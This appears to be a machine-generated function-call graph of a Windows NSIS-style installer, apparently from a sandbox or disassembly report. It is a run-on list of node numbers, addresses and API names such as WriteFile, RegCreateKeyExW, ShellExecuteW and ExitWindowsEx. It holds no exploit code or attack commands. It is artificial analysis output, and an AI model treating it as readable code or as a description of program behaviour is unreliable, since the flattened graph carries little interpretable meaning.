3977 4024fa 3970->3977 3973 402b3a 18 API calls 3971->3973 3974 402b3a 18 API calls 3972->3974 3975 402519 WideCharToMultiByte lstrlenA 3973->3975 3976 402545 lstrlenW 3974->3976 3975->3977 3976->3977 3978 402567 WriteFile 3977->3978 3979 402793 3977->3979 3978->3979 3980 4018ef 3981 401926 3980->3981 3982 402b3a 18 API calls 3981->3982 3983 40192b 3982->3983 3984 4056a1 71 API calls 3983->3984 3985 401934 3984->3985 3986 402770 3987 402b3a 18 API calls 3986->3987 3988 402777 FindFirstFileW 3987->3988 3989 40278a 3988->3989 3990 40279f 3988->3990 3992 4027a8 3990->3992 3994 405d60 wsprintfW 3990->3994 3995 405e19 lstrcpynW 3992->3995 3994->3992 3995->3989 3996 4014f1 SetForegroundWindow 3997 4029c7 3996->3997 3998 4018f2 3999 402b3a 18 API calls 3998->3999 4000 4018f9 3999->4000 4001 4055f5 MessageBoxIndirectW 4000->4001 4002 401902 4001->4002 4003 401df3 4004 402b3a 18 API calls 4003->4004 4005 401df9 4004->4005 4006 402b3a 18 API calls 4005->4006 4007 401e02 4006->4007 4008 402b3a 18 API calls 4007->4008 4009 401e0b 4008->4009 4010 402b3a 18 API calls 4009->4010 4011 401e14 4010->4011 4012 401423 25 API calls 4011->4012 4013 401e1b ShellExecuteW 4012->4013 4014 401e4c 4013->4014 4020 404175 lstrlenW 4021 404194 4020->4021 4022 404196 WideCharToMultiByte 4020->4022 4021->4022 4030 4026f9 4031 402700 4030->4031 4033 402972 4030->4033 4032 402b1d 18 API calls 4031->4032 4034 40270b 4032->4034 4035 402712 SetFilePointer 4034->4035 4035->4033 4036 402722 4035->4036 4038 405d60 wsprintfW 4036->4038 4038->4033 4039 40447b 4040 4044b1 4039->4040 4041 40448b 4039->4041 4042 40408e 8 API calls 4040->4042 4043 404027 19 API calls 4041->4043 4044 4044bd 4042->4044 4045 404498 SetDlgItemTextW 4043->4045 4045->4040 3470 4031ff #17 SetErrorMode OleInitialize 3471 406183 3 API calls 3470->3471 3472 403242 SHGetFileInfoW 3471->3472 3545 405e19 lstrcpynW 3472->3545 3474 40326d GetCommandLineW 3546 405e19 lstrcpynW 3474->3546 3476 40327f GetModuleHandleW 3477 403299 3476->3477 3478 405891 CharNextW 3477->3478 3479 4032a7 CharNextW 3478->3479 3485 4032b9 3479->3485 3480 4033bb 3481 4033cf GetTempPathW 3480->3481 3547 4031cb 3481->3547 3483 4033e7 3486 403441 DeleteFileW 3483->3486 3487 4033eb GetWindowsDirectoryW lstrcatW 3483->3487 3484 405891 CharNextW 3484->3485 3485->3480 3485->3484 3493 4033bd 3485->3493 3555 402d69 GetTickCount GetModuleFileNameW 3486->3555 3489 4031cb 11 API calls 3487->3489 3490 403407 3489->3490 3490->3486 3492 40340b GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3490->3492 3491 403455 3494 403508 3491->3494 3496 4034f8 3491->3496 3500 405891 CharNextW 3491->3500 3495 4031cb 11 API calls 3492->3495 3637 405e19 lstrcpynW 3493->3637 3640 4036d2 3494->3640 3499 403439 3495->3499 3583 4037ac 3496->3583 3499->3486 3499->3494 3515 403474 3500->3515 3503 403521 3505 4055f5 MessageBoxIndirectW 3503->3505 3504 403617 3506 4036ba ExitProcess 3504->3506 3511 406183 3 API calls 3504->3511 3507 40352f ExitProcess 3505->3507 3508 4034d2 3512 40596c 18 API calls 3508->3512 3509 403537 lstrcatW lstrcmpiW 3509->3494 3513 403553 CreateDirectoryW SetCurrentDirectoryW 3509->3513 3514 40362a 3511->3514 3516 4034de 3512->3516 3517 403576 3513->3517 3518 40356b 3513->3518 3519 406183 3 API calls 3514->3519 3515->3508 3515->3509 3516->3494 3638 405e19 lstrcpynW 3516->3638 3648 405e19 lstrcpynW 3517->3648 3647 405e19 lstrcpynW 3518->3647 3522 403633 3519->3522 3524 406183 3 API calls 3522->3524 3525 40363c 3524->3525 3527 40365a 3525->3527 3532 40364a GetCurrentProcess 3525->3532 3526 4034ed 3639 405e19 lstrcpynW 3526->3639 3530 406183 3 API calls 3527->3530 3529 405e3b 18 API calls 3531 4035b5 DeleteFileW 3529->3531 3533 403691 3530->3533 3534 4035c2 CopyFileW 3531->3534 3542 403584 3531->3542 3532->3527 3536 4036a6 ExitWindowsEx 3533->3536 3537 4036b3 3533->3537 3534->3542 3535 40360b 3538 405cb3 40 API calls 3535->3538 3536->3506 3536->3537 3540 40140b 2 API calls 3537->3540 3538->3494 3539 405cb3 40 API calls 3539->3542 3540->3506 3541 405e3b 18 API calls 3541->3542 3542->3529 3542->3535 3542->3539 3542->3541 3543 405590 2 API calls 3542->3543 3544 4035f6 CloseHandle 3542->3544 3543->3542 3544->3542 3545->3474 3546->3476 3548 4060ad 5 API calls 3547->3548 3550 4031d7 3548->3550 3549 4031e1 3549->3483 3550->3549 3551 405864 3 API calls 3550->3551 3552 4031e9 CreateDirectoryW 3551->3552 3649 405ab4 3552->3649 3653 405a85 GetFileAttributesW CreateFileW 3555->3653 3557 402da9 3578 402db9 3557->3578 3654 405e19 lstrcpynW 3557->3654 3559 402dcf 3560 4058b0 2 API calls 3559->3560 3561 402dd5 3560->3561 3655 405e19 lstrcpynW 3561->3655 3563 402de0 GetFileSize 3564 402edc 3563->3564 3576 402df7 3563->3576 3656 402d05 3564->3656 3566 402ee5 3568 402f15 GlobalAlloc 3566->3568 3566->3578 3668 4031b4 SetFilePointer 3566->3668 3567 40319e ReadFile 3567->3576 3667 4031b4 SetFilePointer 3568->3667 3570 402f48 3574 402d05 6 API calls 3570->3574 3572 402efe 3575 40319e ReadFile 3572->3575 3573 402f30 3577 402fa2 37 API calls 3573->3577 3574->3578 3579 402f09 3575->3579 3576->3564 3576->3567 3576->3570 3576->3578 3580 402d05 6 API calls 3576->3580 3581 402f3c 3577->3581 3578->3491 3579->3568 3579->3578 3580->3576 3581->3578 3581->3581 3582 402f79 SetFilePointer 3581->3582 3582->3578 3584 406183 3 API calls 3583->3584 3585 4037c0 3584->3585 3586 4037c6 3585->3586 3587 4037d8 3585->3587 3678 405d60 wsprintfW 3586->3678 3588 405ce6 3 API calls 3587->3588 3589 403808 3588->3589 3591 403827 lstrcatW 3589->3591 3593 405ce6 3 API calls 3589->3593 3592 4037d6 3591->3592 3669 403a82 3592->3669 3593->3591 3596 40596c 18 API calls 3597 403859 3596->3597 3598 4038ed 3597->3598 3600 405ce6 3 API calls 3597->3600 3599 40596c 18 API calls 3598->3599 3601 4038f3 3599->3601 3608 40388b 3600->3608 3602 403903 LoadImageW 3601->3602 3603 405e3b 18 API calls 3601->3603 3604 4039a9 3602->3604 3605 40392a RegisterClassW 3602->3605 3603->3602 3606 40140b 2 API calls 3604->3606 3609 403960 SystemParametersInfoW CreateWindowExW 3605->3609 3636 4039b3 3605->3636 3610 4039af 3606->3610 3607 4038ac lstrlenW 3612 4038e0 3607->3612 3613 4038ba lstrcmpiW 3607->3613 3608->3598 3608->3607 3611 405891 CharNextW 3608->3611 3609->3604 3618 403a82 19 API calls 3610->3618 3610->3636 3616 4038a9 3611->3616 3615 405864 3 API calls 3612->3615 3613->3612 3614 4038ca GetFileAttributesW 3613->3614 3617 4038d6 3614->3617 3619 4038e6 3615->3619 3616->3607 3617->3612 3620 4058b0 2 API calls 3617->3620 3621 4039c0 3618->3621 3679 405e19 lstrcpynW 3619->3679 3620->3612 3623 4039cc ShowWindow LoadLibraryW 3621->3623 3624 403a4f 3621->3624 3626 4039f2 GetClassInfoW 3623->3626 3627 4039eb LoadLibraryW 3623->3627 3625 405194 5 API calls 3624->3625 3628 403a55 3625->3628 3629 403a06 GetClassInfoW RegisterClassW 3626->3629 3630 403a1c DialogBoxParamW 3626->3630 3627->3626 3631 403a71 3628->3631 3632 403a59 3628->3632 3629->3630 3633 40140b 2 API calls 3630->3633 3634 40140b 2 API calls 3631->3634 3635 40140b 2 API calls 3632->3635 3632->3636 3633->3636 3634->3636 3635->3636 3636->3494 3637->3481 3638->3526 3639->3496 3641 4036ea 3640->3641 3642 4036dc CloseHandle 3640->3642 3681 403717 3641->3681 3642->3641 3645 4056a1 71 API calls 3646 403511 OleUninitialize 3645->3646 3646->3503 3646->3504 3647->3517 3648->3542 3650 405ac1 GetTickCount GetTempFileNameW 3649->3650 3651 4031fd 3650->3651 3652 405af7 3650->3652 3651->3483 3652->3650 3652->3651 3653->3557 3654->3559 3655->3563 3657 402d26 3656->3657 3658 402d0e 3656->3658 3661 402d36 GetTickCount 3657->3661 3662 402d2e 3657->3662 3659 402d17 DestroyWindow 3658->3659 3660 402d1e 3658->3660 3659->3660 3660->3566 3664 402d44 CreateDialogParamW ShowWindow 3661->3664 3665 402d67 3661->3665 3663 4061bc 2 API calls 3662->3663 3666 402d34 3663->3666 3664->3665 3665->3566 3666->3566 3667->3573 3668->3572 3670 403a96 3669->3670 3680 405d60 wsprintfW 3670->3680 3672 403b07 3673 405e3b 18 API calls 3672->3673 3674 403b13 SetWindowTextW 3673->3674 3675 403837 3674->3675 3676 403b2f 3674->3676 3675->3596 3676->3675 3677 405e3b 18 API calls 3676->3677 3677->3676 3678->3592 3679->3598 3680->3672 3682 403725 3681->3682 3683 4036ef 3682->3683 3684 40372a FreeLibrary GlobalFree 3682->3684 3683->3645 3684->3683 3684->3684 4046 402c7f 4047 402c91 SetTimer 4046->4047 4048 402caa 4046->4048 4047->4048 4049 402cff 4048->4049 4050 402cc4 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4048->4050 4050->4049 4051 4014ff 4052 401507 4051->4052 4054 40151a 4051->4054 4053 402b1d 18 API calls 4052->4053 4053->4054 2980 405200 2981 405221 GetDlgItem GetDlgItem GetDlgItem 2980->2981 2982 4053aa 2980->2982 3026 40405c SendMessageW 2981->3026 2984 4053b3 GetDlgItem CreateThread FindCloseChangeNotification 2982->2984 2985 4053db 2982->2985 2984->2985 3060 405194 OleInitialize 2984->3060 2987 405406 2985->2987 2989 4053f2 ShowWindow ShowWindow 2985->2989 2990 40542b 2985->2990 2986 405291 2994 405298 GetClientRect GetSystemMetrics SendMessageW SendMessageW 2986->2994 2988 405412 2987->2988 2995 405466 2987->2995 2991 405440 ShowWindow 2988->2991 2992 40541a 2988->2992 3031 40405c SendMessageW 2989->3031 3035 40408e 2990->3035 2999 405460 2991->2999 3000 405452 2991->3000 3032 404000 2992->3032 3001 405306 2994->3001 3002 4052ea SendMessageW SendMessageW 2994->3002 2995->2990 3003 405474 SendMessageW 2995->3003 2998 405439 3005 404000 SendMessageW 2999->3005 3049 4050c1 3000->3049 3006 405319 3001->3006 3007 40530b SendMessageW 3001->3007 3002->3001 3003->2998 3008 40548d CreatePopupMenu 3003->3008 3005->2995 3027 404027 3006->3027 3007->3006 3010 405e3b 18 API calls 3008->3010 3011 40549d AppendMenuW 3010->3011 3013 4054ba GetWindowRect 3011->3013 3014 4054cd TrackPopupMenu 3011->3014 3012 405329 3015 405332 ShowWindow 3012->3015 3016 405366 GetDlgItem SendMessageW 3012->3016 3013->3014 3014->2998 3017 4054e8 3014->3017 3018 405355 3015->3018 3019 405348 ShowWindow 3015->3019 3016->2998 3020 40538d SendMessageW SendMessageW 3016->3020 3021 405504 SendMessageW 3017->3021 3030 40405c SendMessageW 3018->3030 3019->3018 3020->2998 3021->3021 3022 405521 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3021->3022 3024 405546 SendMessageW 3022->3024 3024->3024 3025 40556f GlobalUnlock SetClipboardData CloseClipboard 3024->3025 3025->2998 3026->2986 3028 405e3b 18 API calls 3027->3028 3029 404032 SetDlgItemTextW 3028->3029 3029->3012 3030->3016 3031->2987 3033 404007 3032->3033 3034 40400d SendMessageW 3032->3034 3033->3034 3034->2990 3036 40412f 3035->3036 3037 4040a6 GetWindowLongW 3035->3037 3036->2998 3037->3036 3038 4040b7 3037->3038 3039 4040c6 GetSysColor 3038->3039 3040 4040c9 3038->3040 3039->3040 3041 4040d9 SetBkMode 3040->3041 3042 4040cf SetTextColor 3040->3042 3043 4040f1 GetSysColor 3041->3043 3044 4040f7 3041->3044 3042->3041 3043->3044 3045 404108 3044->3045 3046 4040fe SetBkColor 3044->3046 3045->3036 3047 404122 CreateBrushIndirect 3045->3047 3048 40411b DeleteObject 3045->3048 3046->3045 3047->3036 3048->3047 3050 4050dc 3049->3050 3059 40517e 3049->3059 3051 4050f8 lstrlenW 3050->3051 3052 405e3b 18 API calls 3050->3052 3053 405121 3051->3053 3054 405106 lstrlenW 3051->3054 3052->3051 3055 405134 3053->3055 3056 405127 SetWindowTextW 3053->3056 3057 405118 lstrcatW 3054->3057 3054->3059 3058 40513a SendMessageW SendMessageW SendMessageW 3055->3058 3055->3059 3056->3055 3057->3053 3058->3059 3059->2999 3067 404073 3060->3067 3062 4051de 3063 404073 SendMessageW 3062->3063 3065 4051f0 OleUninitialize 3063->3065 3064 4051b7 3064->3062 3070 401389 3064->3070 3068 40408b 3067->3068 3069 40407c SendMessageW 3067->3069 3068->3064 3069->3068 3072 401390 3070->3072 3071 4013fe 3071->3064 3072->3071 3073 4013cb MulDiv SendMessageW 3072->3073 3073->3072 4055 401000 4056 401037 BeginPaint GetClientRect 4055->4056 4057 40100c DefWindowProcW 4055->4057 4058 4010f3 4056->4058 4060 401179 4057->4060 4061 401073 CreateBrushIndirect FillRect DeleteObject 4058->4061 4062 4010fc 4058->4062 4061->4058 4063 401102 CreateFontIndirectW 4062->4063 4064 401167 EndPaint 4062->4064 4063->4064 4065 401112 6 API calls 4063->4065 4064->4060 4065->4064 4066 401a00 4067 402b3a 18 API calls 4066->4067 4068 401a09 ExpandEnvironmentStringsW 4067->4068 4069 401a1d 4068->4069 4071 401a30 4068->4071 4070 401a22 lstrcmpW 4069->4070 4069->4071 4070->4071 4072 401b01 4073 402b3a 18 API calls 4072->4073 4074 401b08 4073->4074 4075 402b1d 18 API calls 4074->4075 4076 401b11 wsprintfW 4075->4076 4077 4029c7 4076->4077 4078 401f08 4079 402b3a 18 API calls 4078->4079 4080 401f0f GetFileVersionInfoSizeW 4079->4080 4081 401f36 GlobalAlloc 4080->4081 4083 401f8c 4080->4083 4082 401f4a GetFileVersionInfoW 4081->4082 4081->4083 4082->4083 4084 401f59 VerQueryValueW 4082->4084 4084->4083 4085 401f72 4084->4085 4089 405d60 wsprintfW 4085->4089 4087 401f7e 4090 405d60 wsprintfW 4087->4090 4089->4087 4090->4083 4098 401491 4099 4050c1 25 API calls 4098->4099 4100 401498 4099->4100 4101 402295 4102 402b3a 18 API calls 4101->4102 4103 4022a4 4102->4103 4104 402b3a 18 API calls 4103->4104 4105 4022ad 4104->4105 4106 402b3a 18 API calls 4105->4106 4107 4022b7 GetPrivateProfileStringW 4106->4107 4108 404817 4109 404843 4108->4109 4110 404827 4108->4110 4112 404876 4109->4112 4113 404849 SHGetPathFromIDListW 4109->4113 4119 4055d9 GetDlgItemTextW 4110->4119 4115 404860 SendMessageW 4113->4115 4116 404859 4113->4116 4114 404834 SendMessageW 4114->4109 4115->4112 4118 40140b 2 API calls 4116->4118 4118->4115 4119->4114 3440 401718 3441 402b3a 18 API calls 3440->3441 3442 40171f SearchPathW 3441->3442 3443 40173a 3442->3443 4120 401f98 4121 401faa 4120->4121 4131 40205c 4120->4131 4122 402b3a 18 API calls 4121->4122 4124 401fb1 4122->4124 4123 401423 25 API calls 4129 402197 4123->4129 4125 402b3a 18 API calls 4124->4125 4126 401fba 4125->4126 4127 401fd0 LoadLibraryExW 4126->4127 4128 401fc2 GetModuleHandleW 4126->4128 4130 401fe1 4127->4130 4127->4131 4128->4127 4128->4130 4140 4061ef WideCharToMultiByte 4130->4140 4131->4123 4134 401ff2 4137 401423 25 API calls 4134->4137 4138 402002 4134->4138 4135 40202b 4136 4050c1 25 API calls 4135->4136 4136->4138 4137->4138 4138->4129 4139 40204e FreeLibrary 4138->4139 4139->4129 4141 406219 GetProcAddress 4140->4141 4142 401fec 4140->4142 4141->4142 4142->4134 4142->4135 3466 40159b 3467 402b3a 18 API calls 3466->3467 3468 4015a2 SetFileAttributesW 3467->3468 3469 4015b4 3468->3469 4143 40149e 4144 4014ac PostQuitMessage 4143->4144 4145 40223e 4143->4145 4144->4145 4146 4021a0 4147 402b3a 18 API calls 4146->4147 4148 4021a6 4147->4148 4149 402b3a 18 API calls 4148->4149 4150 4021af 4149->4150 4151 402b3a 18 API calls 4150->4151 4152 4021b8 4151->4152 4153 40615c 2 API calls 4152->4153 4154 4021c1 4153->4154 4155 4021d2 lstrlenW lstrlenW 4154->4155 4159 4021c5 4154->4159 4157 4050c1 25 API calls 4155->4157 4156 4050c1 25 API calls 4160 4021cd 4156->4160 4158 402210 SHFileOperationW 4157->4158 4158->4159 4158->4160 4159->4156 4159->4160 4161 401b22 4162 401b73 4161->4162 4163 401b2f 4161->4163 4164 401b78 4162->4164 4165 401b9d GlobalAlloc 4162->4165 4166 40222b 4163->4166 4170 401b46 4163->4170 4174 401bb8 4164->4174 4182 405e19 lstrcpynW 4164->4182 4167 405e3b 18 API calls 4165->4167 4168 405e3b 18 API calls 4166->4168 4167->4174 4169 402238 4168->4169 4176 4055f5 MessageBoxIndirectW 4169->4176 4180 405e19 lstrcpynW 4170->4180 4173 401b8a GlobalFree 4173->4174 4175 401b55 4181 405e19 lstrcpynW 4175->4181 4176->4174 4178 401b64 4183 405e19 lstrcpynW 4178->4183 4180->4175 4181->4178 4182->4173 4183->4174 4184 4029a2 SendMessageW 4185 4029c7 4184->4185 4186 4029bc InvalidateRect 4184->4186 4186->4185 3074 401924 3075 401926 3074->3075 3076 402b3a 18 API calls 3075->3076 3077 40192b 3076->3077 3080 4056a1 3077->3080 3119 40596c 3080->3119 3083 4056e0 3086 40580b 3083->3086 3133 405e19 lstrcpynW 3083->3133 3084 4056c9 DeleteFileW 3085 401934 3084->3085 3086->3085 3152 40615c FindFirstFileW 3086->3152 3088 405706 3089 405719 3088->3089 3090 40570c lstrcatW 3088->3090 3134 4058b0 lstrlenW 3089->3134 3091 40571f 3090->3091 3094 40572f lstrcatW 3091->3094 3096 40573a lstrlenW FindFirstFileW 3091->3096 3094->3096 3099 405800 3096->3099 3117 40575c 3096->3117 3097 405829 3155 405864 lstrlenW CharPrevW 3097->3155 3099->3086 3101 4057e3 FindNextFileW 3105 4057f9 FindClose 3101->3105 3101->3117 3102 405659 5 API calls 3104 40583b 3102->3104 3106 405855 3104->3106 3107 40583f 3104->3107 3105->3099 3109 4050c1 25 API calls 3106->3109 3107->3085 3110 4050c1 25 API calls 3107->3110 3109->3085 3112 40584c 3110->3112 3111 4056a1 64 API calls 3111->3117 3114 405cb3 40 API calls 3112->3114 3113 4050c1 25 API calls 3113->3101 3115 405853 3114->3115 3115->3085 3116 4050c1 25 API calls 3116->3117 3117->3101 3117->3111 3117->3113 3117->3116 3138 405e19 lstrcpynW 3117->3138 3139 405659 3117->3139 3147 405cb3 3117->3147 3158 405e19 lstrcpynW 3119->3158 3121 40597d 3159 40590f CharNextW CharNextW 3121->3159 3124 4056c1 3124->3083 3124->3084 3125 4060ad 5 API calls 3131 405993 3125->3131 3126 4059c4 lstrlenW 3127 4059cf 3126->3127 3126->3131 3129 405864 3 API calls 3127->3129 3128 40615c 2 API calls 3128->3131 3130 4059d4 GetFileAttributesW 3129->3130 3130->3124 3131->3124 3131->3126 3131->3128 3132 4058b0 2 API calls 3131->3132 3132->3126 3133->3088 3135 4058be 3134->3135 3136 4058d0 3135->3136 3137 4058c4 CharPrevW 3135->3137 3136->3091 3137->3135 3137->3136 3138->3117 3165 405a60 GetFileAttributesW 3139->3165 3142 405686 3142->3117 3143 405674 RemoveDirectoryW 3145 405682 3143->3145 3144 40567c DeleteFileW 3144->3145 3145->3142 3146 405692 SetFileAttributesW 3145->3146 3146->3142 3168 406183 GetModuleHandleA 3147->3168 3151 405cdb 3151->3117 3153 406172 FindClose 3152->3153 3154 405825 3152->3154 3153->3154 3154->3085 3154->3097 3156 405880 lstrcatW 3155->3156 3157 40582f 3155->3157 3156->3157 3157->3102 3158->3121 3160 40592c 3159->3160 3162 40593e 3159->3162 3161 405939 CharNextW 3160->3161 3160->3162 3164 405962 3161->3164 3163 405891 CharNextW 3162->3163 3162->3164 3163->3162 3164->3124 3164->3125 3166 405a72 SetFileAttributesW 3165->3166 3167 405665 3165->3167 3166->3167 3167->3142 3167->3143 3167->3144 3169 4061aa GetProcAddress 3168->3169 3170 40619f LoadLibraryA 3168->3170 3171 405cba 3169->3171 3170->3169 3170->3171 3171->3151 3172 405b37 lstrcpyW 3171->3172 3173 405b60 3172->3173 3174 405b86 GetShortPathNameW 3172->3174 3197 405a85 GetFileAttributesW CreateFileW 3173->3197 3176 405b9b 3174->3176 3177 405cad 3174->3177 3176->3177 3179 405ba3 wsprintfA 3176->3179 3177->3151 3178 405b6a CloseHandle GetShortPathNameW 3178->3177 3180 405b7e 3178->3180 3181 405e3b 18 API calls 3179->3181 3180->3174 3180->3177 3182 405bcb 3181->3182 3198 405a85 GetFileAttributesW CreateFileW 3182->3198 3184 405bd8 3184->3177 3185 405be7 GetFileSize GlobalAlloc 3184->3185 3186 405ca6 CloseHandle 3185->3186 3187 405c09 3185->3187 3186->3177 3199 405b08 ReadFile 3187->3199 3192 405c28 lstrcpyA 3195 405c4a 3192->3195 3193 405c3c 3194 4059ea 4 API calls 3193->3194 3194->3195 3196 405c81 SetFilePointer WriteFile GlobalFree 3195->3196 3196->3186 3197->3178 3198->3184 3200 405b26 3199->3200 3200->3186 3201 4059ea lstrlenA 3200->3201 3202 405a2b lstrlenA 3201->3202 3203 405a33 3202->3203 3204 405a04 lstrcmpiA 3202->3204 3203->3192 3203->3193 3204->3203 3205 405a22 CharNextA 3204->3205 3205->3202 4194 402224 4195 40222b 4194->4195 4198 40223e 4194->4198 4196 405e3b 18 API calls 4195->4196 4197 402238 4196->4197 4199 4055f5 MessageBoxIndirectW 4197->4199 4199->4198 4207 402729 4208 4029c7 4207->4208 4209 402730 4207->4209 4210 402736 FindClose 4209->4210 4210->4208 4218 401cab 4219 402b1d 18 API calls 4218->4219 4220 401cb2 4219->4220 4221 402b1d 18 API calls 4220->4221 4222 401cba GetDlgItem 4221->4222 4223 4024e8 4222->4223 4224 4016af 4225 402b3a 18 API calls 4224->4225 4226 4016b5 GetFullPathNameW 4225->4226 4227 4016cf 4226->4227 4233 4016f1 4226->4233 4230 40615c 2 API calls 4227->4230 4227->4233 4228 401706 GetShortPathNameW 4229 4029c7 4228->4229 4231 4016e1 4230->4231 4231->4233 4234 405e19 lstrcpynW 4231->4234 4233->4228 4233->4229 4234->4233 3322 402331 3323 402337 3322->3323 3324 402b3a 18 API calls 3323->3324 3325 402349 3324->3325 3326 402b3a 18 API calls 3325->3326 3327 402353 RegCreateKeyExW 3326->3327 3328 40237d 3327->3328 3338 402793 3327->3338 3329 402b3a 18 API calls 3328->3329 3331 402398 3328->3331 3332 40238e lstrlenW 3329->3332 3330 4023a4 3334 4023bf RegSetValueExW 3330->3334 3339 402fa2 3330->3339 3331->3330 3333 402b1d 18 API calls 3331->3333 3332->3331 3333->3330 3336 4023d5 RegCloseKey 3334->3336 3336->3338 3340 402fbb 3339->3340 3341 402fe6 3340->3341 3371 4031b4 SetFilePointer 3340->3371 3361 40319e 3341->3361 3345 403132 3347 403136 3345->3347 3350 40314e 3345->3350 3346 403003 GetTickCount 3358 403016 3346->3358 3348 40319e ReadFile 3347->3348 3353 40311d 3348->3353 3349 40319e ReadFile 3349->3350 3350->3349 3352 403169 WriteFile 3350->3352 3350->3353 3351 40319e ReadFile 3351->3358 3352->3353 3354 40317e 3352->3354 3353->3334 3354->3350 3354->3353 3356 40307c GetTickCount 3356->3358 3357 4030a5 MulDiv wsprintfW 3359 4050c1 25 API calls 3357->3359 3358->3351 3358->3353 3358->3356 3358->3357 3360 4030e9 WriteFile 3358->3360 3364 4062bf 3358->3364 3359->3358 3360->3353 3360->3358 3362 405b08 ReadFile 3361->3362 3363 402ff1 3362->3363 3363->3345 3363->3346 3363->3353 3365 4062e4 3364->3365 3366 4062ec 3364->3366 3365->3358 3366->3365 3367 406373 GlobalFree 3366->3367 3368 40637c GlobalAlloc 3366->3368 3369 4063f3 GlobalAlloc 3366->3369 3370 4063ea GlobalFree 3366->3370 3367->3368 3368->3365 3368->3366 3369->3365 3369->3366 3370->3369 3371->3341 4235 405035 4236 405045 4235->4236 4237 405059 4235->4237 4238 4050a2 4236->4238 4239 40504b 4236->4239 4240 405061 IsWindowVisible 4237->4240 4246 405078 4237->4246 4241 4050a7 CallWindowProcW 4238->4241 4242 404073 SendMessageW 4239->4242 4240->4238 4243 40506e 4240->4243 4244 405055 4241->4244 4242->4244 4248 40498b SendMessageW 4243->4248 4246->4241 4253 404a0b 4246->4253 4249 4049ea SendMessageW 4248->4249 4250 4049ae GetMessagePos ScreenToClient SendMessageW 4248->4250 4251 4049e2 4249->4251 4250->4251 4252 4049e7 4250->4252 4251->4246 4252->4249 4262 405e19 lstrcpynW 4253->4262 4255 404a1e 4263 405d60 wsprintfW 4255->4263 4257 404a28 4258 40140b 2 API calls 4257->4258 4259 404a31 4258->4259 4264 405e19 lstrcpynW 4259->4264 4261 404a38 4261->4238 4262->4255 4263->4257 4264->4261 4265 4027b5 4266 402b3a 18 API calls 4265->4266 4267 4027c3 4266->4267 4268 4027d9 4267->4268 4270 402b3a 18 API calls 4267->4270 4269 405a60 2 API calls 4268->4269 4271 4027df 4269->4271 4270->4268 4291 405a85 GetFileAttributesW CreateFileW 4271->4291 4273 4027ec 4274 402895 4273->4274 4275 4027f8 GlobalAlloc 4273->4275 4278 4028b0 4274->4278 4279 40289d DeleteFileW 4274->4279 4276 402811 4275->4276 4277 40288c CloseHandle 4275->4277 4292 4031b4 SetFilePointer 4276->4292 4277->4274 4279->4278 4281 402817 4282 40319e ReadFile 4281->4282 4283 402820 GlobalAlloc 4282->4283 4284 402830 4283->4284 4285 402864 WriteFile GlobalFree 4283->4285 4287 402fa2 37 API calls 4284->4287 4286 402fa2 37 API calls 4285->4286 4288 402889 4286->4288 4290 40283d 4287->4290 4288->4277 4289 40285b GlobalFree 4289->4285 4290->4289 4291->4273 4292->4281 4293 4028b6 4294 402b1d 18 API calls 4293->4294 4295 4028bc 4294->4295 4296 4028f8 4295->4296 4297 4028df 4295->4297 4302 402793 4295->4302 4298 402902 4296->4298 4299 40290e 4296->4299 4300 4028e4 4297->4300 4301 4028f5 4297->4301 4303 402b1d 18 API calls 4298->4303 4304 405e3b 18 API calls 4299->4304 4307 405e19 lstrcpynW 4300->4307 4301->4302 4308 405d60 wsprintfW 4301->4308 4303->4301 4304->4301 4307->4302 4308->4302 4309 4014b8 4310 4014be 4309->4310 4311 401389 2 API calls 4310->4311 4312 4014c6 4311->4312 3444 4015b9 3445 402b3a 18 API calls 3444->3445 3446 4015c0 3445->3446 3447 40590f 4 API calls 3446->3447 3458 4015c9 3447->3458 3448 401614 3450 401646 3448->3450 3451 401619 3448->3451 3449 405891 CharNextW 3452 4015d7 CreateDirectoryW 3449->3452 3455 401423 25 API calls 3450->3455 3462 401423 3451->3462 3456 4015ed GetLastError 3452->3456 3452->3458 3461 40163e 3455->3461 3456->3458 3459 4015fa GetFileAttributesW 3456->3459 3458->3448 3458->3449 3459->3458 3460 40162d SetCurrentDirectoryW 3460->3461 3463 4050c1 25 API calls 3462->3463 3464 401431 3463->3464 3465 405e19 lstrcpynW 3464->3465 3465->3460 4313 401939 4314 402b3a 18 API calls 4313->4314 4315 401940 lstrlenW 4314->4315 4316 4024e8 4315->4316 4324 40413b lstrcpynW lstrlenW 4325 40293b 4326 402b1d 18 API calls 4325->4326 4327 402941 4326->4327 4328 402974 4327->4328 4329 402793 4327->4329 4331 40294f 4327->4331 4328->4329 4330 405e3b 18 API calls 4328->4330 4330->4329 4331->4329 4333 405d60 wsprintfW 4331->4333 4333->4329 4334 404a3d GetDlgItem GetDlgItem 4335 404a8f 7 API calls 4334->4335 4341 404ca8 4334->4341 4336 404b32 DeleteObject 4335->4336 4337 404b25 SendMessageW 4335->4337 4338 404b3b 4336->4338 4337->4336 4339 404b72 4338->4339 4340 405e3b 18 API calls 4338->4340 4342 404027 19 API calls 4339->4342 4345 404b54 SendMessageW SendMessageW 4340->4345 4344 404d8c 4341->4344 4351 40498b 5 API calls 4341->4351 4367 404d19 4341->4367 4348 404b86 4342->4348 4343 404e38 4346 404e42 SendMessageW 4343->4346 4347 404e4a 4343->4347 4344->4343 4353 404de5 SendMessageW 4344->4353 4377 404c9b 4344->4377 4345->4338 4346->4347 4355 404e63 4347->4355 4356 404e5c ImageList_Destroy 4347->4356 4363 404e73 4347->4363 4352 404027 19 API calls 4348->4352 4349 40408e 8 API calls 4354 40502e 4349->4354 4350 404d7e SendMessageW 4350->4344 4351->4367 4368 404b94 4352->4368 4358 404dfa SendMessageW 4353->4358 4353->4377 4359 404e6c GlobalFree 4355->4359 4355->4363 4356->4355 4357 404fe2 4364 404ff4 ShowWindow GetDlgItem ShowWindow 4357->4364 4357->4377 4361 404e0d 4358->4361 4359->4363 4360 404c69 GetWindowLongW SetWindowLongW 4362 404c82 4360->4362 4373 404e1e SendMessageW 4361->4373 4365 404ca0 4362->4365 4366 404c88 ShowWindow 4362->4366 4363->4357 4376 404a0b 4 API calls 4363->4376 4381 404eae 4363->4381 4364->4377 4386 40405c SendMessageW 4365->4386 4385 40405c SendMessageW 4366->4385 4367->4344 4367->4350 4368->4360 4369 404c63 4368->4369 4372 404be4 SendMessageW 4368->4372 4374 404c20 SendMessageW 4368->4374 4375 404c31 SendMessageW 4368->4375 4369->4360 4369->4362 4372->4368 4373->4343 4374->4368 4375->4368 4376->4381 4377->4349 4378 404fb8 InvalidateRect 4378->4357 4379 404fce 4378->4379 